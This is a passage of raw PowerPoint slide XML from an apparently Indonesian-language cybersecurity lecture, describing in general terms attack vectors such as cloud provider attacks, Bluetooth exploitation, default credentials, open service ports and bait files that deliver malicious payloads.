            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud (CSP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> korban.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Bluetooth-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Bluetooth.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kendali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> default. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipublikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dokumentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyiapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka-pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> UDP yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memproses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>datang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3653718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Vektor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Umpan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dangkal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menarik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menarik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>targetnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginginkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyembunyikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kail. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istilah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kendali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
